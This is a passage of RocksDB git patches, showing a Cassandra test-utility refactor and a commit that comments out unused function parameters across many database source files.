} else { - return std::unique_ptr( + return std::shared_ptr( new Column(mask, index, timestamp, sizeof(kData), kData)); } } RowValue CreateTestRowValue( std::vector> column_specs) { - std::vector> columns; + std::vector> columns; int64_t last_modified_time = 0; for (auto spec: column_specs) { auto c = CreateTestColumn(std::get<0>(spec), std::get<1>(spec), @@ -50,7 +50,7 @@ RowValue CreateRowTombstone(int64_t timestamp) { } void VerifyRowValueColumns( - std::vector> &columns, + std::vector> &columns, std::size_t index_of_vector, int8_t expected_mask, int8_t expected_index, @@ -61,5 +61,9 @@ void VerifyRowValueColumns( EXPECT_EQ(expected_index, columns[index_of_vector]->Index()); } +int64_t ToMicroSeconds(int64_t seconds) { + return seconds * (int64_t)1000000; +} + } } diff --git a/utilities/merge_operators/cassandra/test_utils.h b/utilities/cassandra/test_utils.h similarity index 82% rename from utilities/merge_operators/cassandra/test_utils.h rename to utilities/cassandra/test_utils.h index 4025b2a3fe8..7ca6cfd6146 100644 --- a/utilities/merge_operators/cassandra/test_utils.h +++ b/utilities/cassandra/test_utils.h @@ -8,8 +8,8 @@ #pragma once #include #include "util/testharness.h" -#include "utilities/merge_operators/cassandra/format.h" -#include "utilities/merge_operators/cassandra/serialize.h" +#include "utilities/cassandra/format.h" +#include "utilities/cassandra/serialize.h" namespace rocksdb { namespace cassandra { @@ -22,7 +22,7 @@ extern const int8_t kTombstone; extern const int8_t kExpiringColumn; -std::unique_ptr CreateTestColumn(int8_t mask, +std::shared_ptr CreateTestColumn(int8_t mask, int8_t index, int64_t timestamp); @@ -32,12 +32,14 @@ RowValue CreateTestRowValue( RowValue CreateRowTombstone(int64_t timestamp); void VerifyRowValueColumns( - std::vector> &columns, + std::vector> &columns, std::size_t index_of_vector, int8_t expected_mask, int8_t expected_index, int64_t expected_timestamp ); +int64_t ToMicroSeconds(int64_t seconds); + } } diff --git a/utilities/merge_operators/cassandra/cassandra_merge_test.cc b/utilities/merge_operators/cassandra/cassandra_merge_test.cc deleted file mode 100644 index 84886161e25..00000000000 --- a/utilities/merge_operators/cassandra/cassandra_merge_test.cc +++ /dev/null @@ -1,134 +0,0 @@ -// Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under both the GPLv2 (found in the -// COPYING file in the root directory) and Apache 2.0 License -// (found in the LICENSE.Apache file in the root directory). -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. - -#include - -#include "rocksdb/db.h" -#include "rocksdb/merge_operator.h" -#include "rocksdb/utilities/db_ttl.h" -#include "util/testharness.h" -#include "util/random.h" -#include "utilities/merge_operators.h" -#include "utilities/merge_operators/cassandra/merge_operator.h" -#include "utilities/merge_operators/cassandra/test_utils.h" - -using namespace rocksdb; - -namespace rocksdb { -namespace cassandra { - -// Path to the database on file system -const std::string kDbName = test::TmpDir() + "/cassandramerge_test"; - -class CassandraStore { - public: - explicit CassandraStore(std::shared_ptr db) - : db_(db), - merge_option_(), - get_option_() { - assert(db); - } - - bool Append(const std::string& key, const RowValue& val){ - std::string result; - val.Serialize(&result); - Slice valSlice(result.data(), result.size()); - auto s = db_->Merge(merge_option_, key, valSlice); - - if (s.ok()) { - return true; - } else { - std::cerr << "ERROR " << s.ToString() << std::endl; - return false; - } - } - - std::tuple Get(const std::string& key){ - std::string result; - auto s = db_->Get(get_option_, key, &result); - - if (s.ok()) { - return std::make_tuple(true, - RowValue::Deserialize(result.data(), - result.size())); - } - - if (!s.IsNotFound()) { - std::cerr << "ERROR " << s.ToString() << std::endl; - } - - return std::make_tuple(false, RowValue(0, 0)); - } - - private: - std::shared_ptr db_; - WriteOptions merge_option_; - ReadOptions get_option_; -}; - - -// The class for unit-testing -class CassandraMergeTest : public testing::Test { - public: - CassandraMergeTest() { - DestroyDB(kDbName, Options()); // Start each test with a fresh DB - } - - std::shared_ptr OpenDb() { - DB* db; - Options options; - options.create_if_missing = true; - options.merge_operator.reset(new CassandraValueMergeOperator()); - EXPECT_OK(DB::Open(options, kDbName, &db)); - return std::shared_ptr(db); - } -}; - -// THE TEST CASES BEGIN HERE - -TEST_F(CassandraMergeTest, SimpleTest) { - auto db = OpenDb(); - CassandraStore store(db); - - store.Append("k1", CreateTestRowValue({ - std::make_tuple(kTombstone, 0, 5), - std::make_tuple(kColumn, 1, 8), - std::make_tuple(kExpiringColumn, 2, 5), - })); - store.Append("k1",CreateTestRowValue({ - std::make_tuple(kColumn, 0, 2), - std::make_tuple(kExpiringColumn, 1, 5), - std::make_tuple(kTombstone, 2, 7), - std::make_tuple(kExpiringColumn, 7, 17), - })); - store.Append("k1", CreateTestRowValue({ - std::make_tuple(kExpiringColumn, 0, 6), - std::make_tuple(kTombstone, 1, 5), - std::make_tuple(kColumn, 2, 4), - std::make_tuple(kTombstone, 11, 11), - })); - - auto ret = store.Get("k1"); - - ASSERT_TRUE(std::get<0>(ret)); - RowValue& merged = std::get<1>(ret); - EXPECT_EQ(merged.columns_.size(), 5); - VerifyRowValueColumns(merged.columns_, 0, kExpiringColumn, 0, 6); - VerifyRowValueColumns(merged.columns_, 1, kColumn, 1, 8); - VerifyRowValueColumns(merged.columns_, 2, kTombstone, 2, 7); - VerifyRowValueColumns(merged.columns_, 3, kExpiringColumn, 7, 17); - VerifyRowValueColumns(merged.columns_, 4, kTombstone, 11, 11); -} - - -} // namespace cassandra -} // namespace rocksdb - -int main(int argc, char** argv) { - ::testing::InitGoogleTest(&argc, argv); - return RUN_ALL_TESTS(); -} From 1d7048c5985e60be8e356663ec3cb6d020adb44d Mon Sep 17 00:00:00 2001 From: Victor Gao Date: Fri, 21 Jul 2017 14:50:24 -0700 Subject: [PATCH 025/205] comment out unused parameters Summary: This uses `clang-tidy` to comment out unused parameters (in functions, methods and lambdas) in fbcode. Cases that the tool failed to handle are fixed manually. Reviewed By: igorsugak Differential Revision: D5454343 fbshipit-source-id: 5dee339b4334e25e963891b519a5aa81fbf627b2 --- cache/cache_test.cc | 6 +- cache/clock_cache.cc | 2 +- cache/sharded_cache.cc | 2 +- db/builder.cc | 8 +- db/c.cc | 16 +- db/column_family_test.cc | 51 +++--- db/compact_files_test.cc | 9 +- db/compacted_db_impl.h | 45 ++--- db/compaction_iterator.cc | 2 +- db/compaction_iterator.h | 2 +- db/compaction_iterator_test.cc | 29 ++-- db/compaction_job_stats_test.cc | 10 +- db/compaction_picker.cc | 9 +- db/compaction_picker.h | 26 +-- db/compaction_picker_test.cc | 4 +- db/comparator_db_test.cc | 18 +- db/db_block_cache_test.cc | 2 +- db/db_bloom_filter_test.cc | 4 +- db/db_compaction_filter_test.cc | 48 +++--- db/db_compaction_test.cc | 46 +++-- db/db_dynamic_level_test.cc | 4 +- db/db_flush_test.cc | 4 +- db/db_impl.cc | 27 +-- db/db_impl_compaction_flush.cc | 2 +- db/db_impl_readonly.cc | 2 +- db/db_impl_readonly.h | 59 +++---- db/db_impl_write.cc | 2 +- db/db_iter_test.cc | 6 +- db/db_iterator_test.cc | 6 +- db/db_memtable_test.cc | 2 +- db/db_properties_test.cc | 12 +- db/db_sst_test.cc | 13 +- db/db_tailing_iter_test.cc | 6 +- db/db_test.cc | 163 +++++++++--------- db/db_test2.cc | 23 ++- db/db_test_util.cc | 11 +- db/db_test_util.h | 2 +- db/db_universal_compaction_test.cc | 50 +++--- db/deletefile_test.cc | 2 +- db/external_sst_file_test.cc | 15 +- db/fault_injection_test.cc | 4 +- db/file_indexer_test.cc | 6 +- db/forward_iterator.cc | 2 +- db/forward_iterator.h | 2 +- db/internal_stats.cc | 117 +++++++------ db/listener_test.cc | 17 +- db/malloc_stats.cc | 2 +- db/manual_compaction_test.cc | 6 +- db/memtable_list.cc | 4 +- db/merge_test.cc | 2 +- db/plain_table_db_test.cc | 2 +- db/prefix_test.cc | 6 +- db/table_cache.cc | 4 +- db/table_properties_collector.cc | 4 +- db/table_properties_collector.h | 2 +- db/table_properties_collector_test.cc | 19 +- db/version_builder.cc | 2 +- db/version_edit.cc | 2 +- db/version_set.cc | 6 +- db/version_set.h | 2 +- db/version_set_test.cc | 4 +- db/wal_manager_test.cc | 2 +- db/write_batch.cc | 6 +- db/write_batch_test.cc | 32 ++-- db/write_callback_test.cc | 6 +- db/write_thread.cc | 3 +- env/env_encryption.cc | 14 +- env/env_hdfs.cc | 10 +- env/env_test.cc | 21 ++- env/io_posix.cc | 4 +- env/io_posix.h | 2 +- env/mock_env.cc | 14 +- hdfs/env_hdfs.h | 101 ++++++----- include/rocksdb/cache.h | 3 +- include/rocksdb/compaction_filter.h | 12 +- include/rocksdb/db.h | 2 +- include/rocksdb/env.h | 51 +++--- include/rocksdb/filter_policy.h | 5 +- include/rocksdb/iterator.h | 2 +- include/rocksdb/listener.h | 4 +- include/rocksdb/memtablerep.h | 8 +- include/rocksdb/merge_operator.h | 15 +- include/rocksdb/rate_limiter.h | 2 +- include/rocksdb/slice.h | 2 +- include/rocksdb/slice_transform.h | 4 +- include/rocksdb/statistics.h | 2 +- include/rocksdb/utilities/geo_db.h | 2 +- .../utilities/optimistic_transaction_db.h | 2 +- include/rocksdb/utilities/transaction.h | 6 +- include/rocksdb/wal_filter.h | 18 +- include/rocksdb/write_batch.h | 11 +- memtable/hash_cuckoo_rep.cc | 6 +- memtable/hash_linklist_rep.cc | 14 +- memtable/hash_skiplist_rep.cc | 14 +- memtable/skiplistrep.cc | 2 +- memtable/vectorrep.cc | 6 +- options/options_helper.cc | 2 +- options/options_parser.cc | 2 +- port/port_posix.cc | 2 +- port/stack_trace.cc | 2 +- table/adaptive_table_factory.cc | 2 +- table/adaptive_table_factory.h | 5 +- table/block_based_filter_block.cc | 10 +- table/block_based_table_builder.cc | 6 +- table/block_based_table_factory.cc | 3 +- table/block_based_table_reader.cc | 18 +- table/block_test.cc | 2 +- table/cuckoo_table_builder_test.cc | 2 +- table/cuckoo_table_factory.cc | 2 +- table/cuckoo_table_factory.h | 5 +- table/cuckoo_table_reader.cc | 11 +- table/cuckoo_table_reader.h | 2 +- table/cuckoo_table_reader_test.cc | 2 +- table/full_filter_block.cc | 14 +- table/full_filter_block.h | 2 +- table/get_context.cc | 2 +- table/index_builder.h | 4 +- table/internal_iterator.h | 5 +- table/iterator.cc | 8 +- table/mock_table.cc | 16 +- table/mock_table.h | 6 +- table/partitioned_filter_block.cc | 2 +- table/partitioned_filter_block_test.cc | 4 +- table/plain_table_factory.cc | 2 +- table/plain_table_factory.h | 5 +- table/plain_table_key_coding.cc | 2 +- table/plain_table_reader.cc | 10 +- table/sst_file_writer_collectors.h | 6 +- table/table_reader.h | 6 +- table/table_test.cc | 53 +++--- third-party/fbson/FbsonDocument.h | 2 +- tools/db_bench_tool.cc | 16 +- tools/ldb_cmd.cc | 40 ++--- tools/ldb_tool.cc | 2 +- tools/sst_dump_tool.cc | 6 +- util/compression.h | 22 +-- util/delete_scheduler_test.cc | 17 +- util/file_reader_writer_test.cc | 36 ++-- util/slice.cc | 8 +- util/testutil.cc | 6 +- util/testutil.h | 74 ++++---- util/thread_local_test.cc | 2 +- utilities/backupable/backupable_db.cc | 2 +- utilities/backupable/backupable_db_test.cc | 11 +- utilities/blob_db/blob_db.h | 6 +- utilities/blob_db/blob_db_impl.cc | 13 +- utilities/blob_db/blob_log_reader.cc | 2 +- utilities/checkpoint/checkpoint_impl.cc | 4 +- utilities/checkpoint/checkpoint_test.cc | 2 +- utilities/col_buf_decoder.h | 2 +- .../remove_emptyvalue_compactionfilter.cc | 11 +- utilities/document/document_db.cc | 21 +-- utilities/merge_operators/max.cc | 8 +- utilities/merge_operators/put.cc | 27 ++- .../string_append/stringappend.cc | 8 +- .../string_append/stringappend2.cc | 8 +- utilities/merge_operators/uint64add.cc | 6 +- utilities/object_registry_test.cc | 13 +- utilities/options/options_util_test.cc | 34 ++-- .../persistent_cache/block_cache_tier_file.cc | 2 +- .../persistent_cache/block_cache_tier_file.h | 6 +- utilities/persistent_cache/hash_table_test.cc | 4 +- .../persistent_cache/persistent_cache_test.h | 4 +- .../persistent_cache/persistent_cache_tier.cc | 4 +- .../persistent_cache/volatile_tier_impl.cc | 2 +- utilities/redis/redis_list_iterator.h | 2 +- utilities/simulator_cache/sim_cache.cc | 2 +- utilities/simulator_cache/sim_cache_test.cc | 2 +- utilities/spatialdb/spatial_db.cc | 2 +- .../compact_on_deletion_collector.cc | 11 +- .../compact_on_deletion_collector.h | 2 +- .../compact_on_deletion_collector_test.cc | 2 +- .../optimistic_transaction_impl.cc | 2 +- .../optimistic_transaction_impl.h | 4 +- utilities/transactions/transaction_base.h | 2 +- utilities/transactions/transaction_impl.cc | 4 +- utilities/transactions/transaction_impl.h | 2 +- utilities/transactions/transaction_test.cc | 8 +- utilities/ttl/ttl_test.cc | 6 +- .../write_batch_with_index_test.cc | 2 +- 180 files changed, 1076 insertions(+), 1006 deletions(-) diff --git a/cache/cache_test.cc b/cache/cache_test.cc index 8e241226d9c..55f9cc6bb63 100644 --- a/cache/cache_test.cc +++ b/cache/cache_test.cc @@ -40,9 +40,9 @@ static int DecodeValue(void* v) { const std::string kLRU = "lru"; const std::string kClock = "clock"; -void dumbDeleter(const Slice& key, void* value) {} +void dumbDeleter(const Slice& /*key*/, void* /*value*/) {} -void eraseDeleter(const Slice& key, void* value) { +void eraseDeleter(const Slice& /*key*/, void* value) { Cache* cache = reinterpret_cast(value); cache->Erase("foo"); } @@ -470,7 +470,7 @@ class Value { }; namespace { -void deleter(const Slice& key, void* value) { +void deleter(const Slice& /*key*/, void* value) { delete static_cast(value); } } // namespace diff --git a/cache/clock_cache.cc b/cache/clock_cache.cc index db9d1438e22..d5b32f82fe5 100644 --- a/cache/clock_cache.cc +++ b/cache/clock_cache.cc @@ -581,7 +581,7 @@ Status ClockCacheShard::Insert(const Slice& key, uint32_t hash, void* value, size_t charge, void (*deleter)(const Slice& key, void* value), Cache::Handle** out_handle, - Cache::Priority priority) { + Cache::Priority /*priority*/) { CleanupContext context; HashTable::accessor accessor; char* key_data = new char[key.size()]; diff --git a/cache/sharded_cache.cc b/cache/sharded_cache.cc index 9bdea3a08e1..6a0a2228211 100644 --- a/cache/sharded_cache.cc +++ b/cache/sharded_cache.cc @@ -53,7 +53,7 @@ Status ShardedCache::Insert(const Slice& key, void* value, size_t charge, ->Insert(key, hash, value, charge, deleter, handle, priority); } -Cache::Handle* ShardedCache::Lookup(const Slice& key, Statistics* stats) { +Cache::Handle* ShardedCache::Lookup(const Slice& key, Statistics* /*stats*/) { uint32_t hash = HashSlice(key); return GetShard(Shard(hash))->Lookup(key, hash); } diff --git a/db/builder.cc b/db/builder.cc index 6f973fdbd5b..6c68e7c4052 100644 --- a/db/builder.cc +++ b/db/builder.cc @@ -61,10 +61,10 @@ TableBuilder* NewTableBuilder( Status BuildTable( const std::string& dbname, Env* env, const ImmutableCFOptions& ioptions, - const MutableCFOptions& mutable_cf_options, const EnvOptions& env_options, - TableCache* table_cache, InternalIterator* iter, - std::unique_ptr range_del_iter, FileMetaData* meta, - const InternalKeyComparator& internal_comparator, + const MutableCFOptions& /*mutable_cf_options*/, + const EnvOptions& env_options, TableCache* table_cache, + InternalIterator* iter, std::unique_ptr range_del_iter, + FileMetaData* meta, const InternalKeyComparator& internal_comparator, const std::vector>* int_tbl_prop_collector_factories, uint32_t column_family_id, const std::string& column_family_name, diff --git a/db/c.cc b/db/c.cc index 441ffade3b6..a09d014ec1e 100644 --- a/db/c.cc +++ b/db/c.cc @@ -240,7 +240,7 @@ struct rocksdb_comparator_t : public Comparator { // No-ops since the C binding does not support key shortening methods. virtual void FindShortestSeparator(std::string*, const Slice&) const override {} - virtual void FindShortSuccessor(std::string* key) const override {} + virtual void FindShortSuccessor(std::string* /*key*/) const override {} }; struct rocksdb_filterpolicy_t : public FilterPolicy { @@ -355,7 +355,7 @@ struct rocksdb_mergeoperator_t : public MergeOperator { virtual bool PartialMergeMulti(const Slice& key, const std::deque& operand_list, std::string* new_value, - Logger* logger) const override { + Logger* /*logger*/) const override { size_t operand_count = operand_list.size(); std::vector operand_pointers(operand_count); std::vector operand_sizes(operand_count); @@ -2106,8 +2106,8 @@ void rocksdb_options_set_level0_stop_writes_trigger( opt->rep.level0_stop_writes_trigger = n; } -void rocksdb_options_set_max_mem_compaction_level(rocksdb_options_t* opt, - int n) {} +void rocksdb_options_set_max_mem_compaction_level(rocksdb_options_t* /*opt*/, + int /*n*/) {} void rocksdb_options_set_wal_recovery_mode(rocksdb_options_t* opt,int mode) { opt->rep.wal_recovery_mode = static_cast(mode); @@ -2171,8 +2171,8 @@ void rocksdb_options_set_manifest_preallocation_size( } // noop -void rocksdb_options_set_purge_redundant_kvs_while_flush(rocksdb_options_t* opt, - unsigned char v) {} +void rocksdb_options_set_purge_redundant_kvs_while_flush( + rocksdb_options_t* /*opt*/, unsigned char /*v*/) {} void rocksdb_options_set_use_direct_reads(rocksdb_options_t* opt, unsigned char v) { @@ -2332,7 +2332,7 @@ void rocksdb_options_set_table_cache_numshardbits( } void rocksdb_options_set_table_cache_remove_scan_count_limit( - rocksdb_options_t* opt, int v) { + rocksdb_options_t* /*opt*/, int /*v*/) { // this option is deprecated } @@ -2836,7 +2836,7 @@ rocksdb_sstfilewriter_t* rocksdb_sstfilewriter_create( rocksdb_sstfilewriter_t* rocksdb_sstfilewriter_create_with_comparator( const rocksdb_envoptions_t* env, const rocksdb_options_t* io_options, - const rocksdb_comparator_t* comparator) { + const rocksdb_comparator_t* /*comparator*/) { rocksdb_sstfilewriter_t* writer = new rocksdb_sstfilewriter_t; writer->rep = new SstFileWriter(env->rep, io_options->rep); return writer; diff --git a/db/column_family_test.cc b/db/column_family_test.cc index 88786d469d5..440fc9930a3 100644 --- a/db/column_family_test.cc +++ b/db/column_family_test.cc @@ -1168,13 +1168,14 @@ TEST_F(ColumnFamilyTest, MemtableNotSupportSnapshot) { #endif // !ROCKSDB_LITE class TestComparator : public Comparator { - int Compare(const rocksdb::Slice& a, const rocksdb::Slice& b) const override { + int Compare(const rocksdb::Slice& /*a*/, + const rocksdb::Slice& /*b*/) const override { return 0; } const char* Name() const override { return "Test"; } - void FindShortestSeparator(std::string* start, - const rocksdb::Slice& limit) const override {} - void FindShortSuccessor(std::string* key) const override {} + void FindShortestSeparator(std::string* /*start*/, + const rocksdb::Slice& /*limit*/) const override {} + void FindShortSuccessor(std::string* /*key*/) const override {} }; static TestComparator third_comparator; @@ -1346,7 +1347,7 @@ TEST_F(ColumnFamilyTest, MultipleManualCompactions) { {"ColumnFamilyTest::MultiManual:2", "ColumnFamilyTest::MultiManual:5"}, {"ColumnFamilyTest::MultiManual:2", "ColumnFamilyTest::MultiManual:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::MultiManual:4"); cf_1_1 = false; @@ -1439,7 +1440,7 @@ TEST_F(ColumnFamilyTest, AutomaticAndManualCompactions) { {"ColumnFamilyTest::AutoManual:2", "ColumnFamilyTest::AutoManual:5"}, {"ColumnFamilyTest::AutoManual:2", "ColumnFamilyTest::AutoManual:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { if (cf_1_1) { cf_1_1 = false; TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:4"); @@ -1540,7 +1541,7 @@ TEST_F(ColumnFamilyTest, ManualAndAutomaticCompactions) { {"ColumnFamilyTest::ManualAuto:5", "ColumnFamilyTest::ManualAuto:2"}, {"ColumnFamilyTest::ManualAuto:2", "ColumnFamilyTest::ManualAuto:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4"); cf_1_1 = false; @@ -1633,7 +1634,7 @@ TEST_F(ColumnFamilyTest, SameCFManualManualCompactions) { {"ColumnFamilyTest::ManualManual:1", "ColumnFamilyTest::ManualManual:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualManual:4"); cf_1_1 = false; @@ -1731,7 +1732,7 @@ TEST_F(ColumnFamilyTest, SameCFManualAutomaticCompactions) { {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:2"}, {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4"); cf_1_1 = false; @@ -1823,7 +1824,7 @@ TEST_F(ColumnFamilyTest, SameCFManualAutomaticCompactionsLevel) { "ColumnFamilyTest::ManualAuto:3"}, {"ColumnFamilyTest::ManualAuto:1", "ColumnFamilyTest::ManualAuto:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualAuto:4"); cf_1_1 = false; @@ -1926,7 +1927,7 @@ TEST_F(ColumnFamilyTest, SameCFManualAutomaticConflict) { {"ColumnFamilyTest::ManualAutoCon:1", "ColumnFamilyTest::ManualAutoCon:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:4"); cf_1_1 = false; @@ -2030,7 +2031,7 @@ TEST_F(ColumnFamilyTest, SameCFAutomaticManualCompactions) { {"CompactionPicker::CompactRange:Conflict", "ColumnFamilyTest::AutoManual:3"}}); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) { + "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* /*arg*/) { if (cf_1_1) { TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:4"); cf_1_1 = false; @@ -2476,21 +2477,21 @@ TEST_F(ColumnFamilyTest, CreateAndDropRace) { auto main_thread_id = std::this_thread::get_id(); - rocksdb::SyncPoint::GetInstance()->SetCallBack("PersistRocksDBOptions:start", - [&](void* arg) { - auto current_thread_id = std::this_thread::get_id(); - // If it's the main thread hitting this sync-point, then it - // will be blocked until some other thread update the test_stage. - if (main_thread_id == current_thread_id) { - test_stage = kMainThreadStartPersistingOptionsFile; - while (test_stage < kChildThreadFinishDroppingColumnFamily) { - Env::Default()->SleepForMicroseconds(100); - } - } - }); + rocksdb::SyncPoint::GetInstance()->SetCallBack( + "PersistRocksDBOptions:start", [&](void* /*arg*/) { + auto current_thread_id = std::this_thread::get_id(); + // If it's the main thread hitting this sync-point, then it + // will be blocked until some other thread update the test_stage. + if (main_thread_id == current_thread_id) { + test_stage = kMainThreadStartPersistingOptionsFile; + while (test_stage < kChildThreadFinishDroppingColumnFamily) { + Env::Default()->SleepForMicroseconds(100); + } + } + }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "WriteThread::EnterUnbatched:Wait", [&](void* arg) { + "WriteThread::EnterUnbatched:Wait", [&](void* /*arg*/) { // This means a thread doing DropColumnFamily() is waiting for // other thread to finish persisting options. // In such case, we update the test_stage to unblock the main thread. diff --git a/db/compact_files_test.cc b/db/compact_files_test.cc index 5aad6114f5e..7f150453960 100644 --- a/db/compact_files_test.cc +++ b/db/compact_files_test.cc @@ -37,8 +37,7 @@ class FlushedFileCollector : public EventListener { FlushedFileCollector() {} ~FlushedFileCollector() {} - virtual void OnFlushCompleted( - DB* db, const FlushJobInfo& info) override { + virtual void OnFlushCompleted(DB* /*db*/, const FlushJobInfo& info) override { std::lock_guard lock(mutex_); flushed_files_.push_back(info.file_path); } @@ -257,9 +256,9 @@ TEST_F(CompactFilesTest, CapturingPendingFiles) { TEST_F(CompactFilesTest, CompactionFilterWithGetSv) { class FilterWithGet : public CompactionFilter { public: - virtual bool Filter(int level, const Slice& key, const Slice& value, - std::string* new_value, - bool* value_changed) const override { + virtual bool Filter(int /*level*/, const Slice& /*key*/, + const Slice& /*value*/, std::string* /*new_value*/, + bool* /*value_changed*/) const override { if (db_ == nullptr) { return true; } diff --git a/db/compacted_db_impl.h b/db/compacted_db_impl.h index de32f21e681..736002e1e52 100644 --- a/db/compacted_db_impl.h +++ b/db/compacted_db_impl.h @@ -32,55 +32,56 @@ class CompactedDBImpl : public DBImpl { override; using DBImpl::Put; - virtual Status Put(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value) override { + virtual Status Put(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/, const Slice& /*value*/) override { return Status::NotSupported("Not supported in compacted db mode."); } using DBImpl::Merge; - virtual Status Merge(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value) override { + virtual Status Merge(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/, const Slice& /*value*/) override { return Status::NotSupported("Not supported in compacted db mode."); } using DBImpl::Delete; - virtual Status Delete(const WriteOptions& options, - ColumnFamilyHandle* column_family, - const Slice& key) override { + virtual Status Delete(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/) override { return Status::NotSupported("Not supported in compacted db mode."); } - virtual Status Write(const WriteOptions& options, - WriteBatch* updates) override { + virtual Status Write(const WriteOptions& /*options*/, + WriteBatch* /*updates*/) override { return Status::NotSupported("Not supported in compacted db mode."); } using DBImpl::CompactRange; - virtual Status CompactRange(const CompactRangeOptions& options, - ColumnFamilyHandle* column_family, - const Slice* begin, const Slice* end) override { + virtual Status CompactRange(const CompactRangeOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice* /*begin*/, + const Slice* /*end*/) override { return Status::NotSupported("Not supported in compacted db mode."); } virtual Status DisableFileDeletions() override { return Status::NotSupported("Not supported in compacted db mode."); } - virtual Status EnableFileDeletions(bool force) override { + virtual Status EnableFileDeletions(bool /*force*/) override { return Status::NotSupported("Not supported in compacted db mode."); } virtual Status GetLiveFiles(std::vector&, - uint64_t* manifest_file_size, - bool flush_memtable = true) override { + uint64_t* /*manifest_file_size*/, + bool /*flush_memtable*/ = true) override { return Status::NotSupported("Not supported in compacted db mode."); } using DBImpl::Flush; - virtual Status Flush(const FlushOptions& options, - ColumnFamilyHandle* column_family) override { + virtual Status Flush(const FlushOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/) override { return Status::NotSupported("Not supported in compacted db mode."); } using DB::IngestExternalFile; virtual Status IngestExternalFile( - ColumnFamilyHandle* column_family, - const std::vector& external_files, - const IngestExternalFileOptions& ingestion_options) override { + ColumnFamilyHandle* /*column_family*/, + const std::vector& /*external_files*/, + const IngestExternalFileOptions& /*ingestion_options*/) override { return Status::NotSupported("Not supported in compacted db mode."); } diff --git a/db/compaction_iterator.cc b/db/compaction_iterator.cc index 08ae1973409..211a48def73 100644 --- a/db/compaction_iterator.cc +++ b/db/compaction_iterator.cc @@ -50,7 +50,7 @@ CompactionIterator::CompactionIterator( CompactionIterator::CompactionIterator( InternalIterator* input, const Comparator* cmp, MergeHelper* merge_helper, - SequenceNumber last_sequence, std::vector* snapshots, + SequenceNumber /*last_sequence*/, std::vector* snapshots, SequenceNumber earliest_write_conflict_snapshot, Env* env, bool expect_valid_internal_key, RangeDelAggregator* range_del_agg, std::unique_ptr compaction, diff --git a/db/compaction_iterator.h b/db/compaction_iterator.h index cad23866699..492e53abff0 100644 --- a/db/compaction_iterator.h +++ b/db/compaction_iterator.h @@ -31,7 +31,7 @@ class CompactionIterator { : compaction_(compaction) {} virtual ~CompactionProxy() = default; - virtual int level(size_t compaction_input_level = 0) const { + virtual int level(size_t /*compaction_input_level*/ = 0) const { return compaction_->level(); } virtual bool KeyNotExistsBeyondOutputLevel( diff --git a/db/compaction_iterator_test.cc b/db/compaction_iterator_test.cc index b625c99ffaa..7f2915b0aa3 100644 --- a/db/compaction_iterator_test.cc +++ b/db/compaction_iterator_test.cc @@ -17,15 +17,15 @@ namespace rocksdb { // Expects no merging attempts. class NoMergingMergeOp : public MergeOperator { public: - bool FullMergeV2(const MergeOperationInput& merge_in, - MergeOperationOutput* merge_out) const override { + bool FullMergeV2(const MergeOperationInput& /*merge_in*/, + MergeOperationOutput* /*merge_out*/) const override { ADD_FAILURE(); return false; } - bool PartialMergeMulti(const Slice& key, - const std::deque& operand_list, - std::string* new_value, - Logger* logger) const override { + bool PartialMergeMulti(const Slice& /*key*/, + const std::deque& /*operand_list*/, + std::string* /*new_value*/, + Logger* /*logger*/) const override { ADD_FAILURE(); return false; } @@ -39,9 +39,10 @@ class NoMergingMergeOp : public MergeOperator { // Always returns Decition::kRemove. class StallingFilter : public CompactionFilter { public: - virtual Decision FilterV2(int level, const 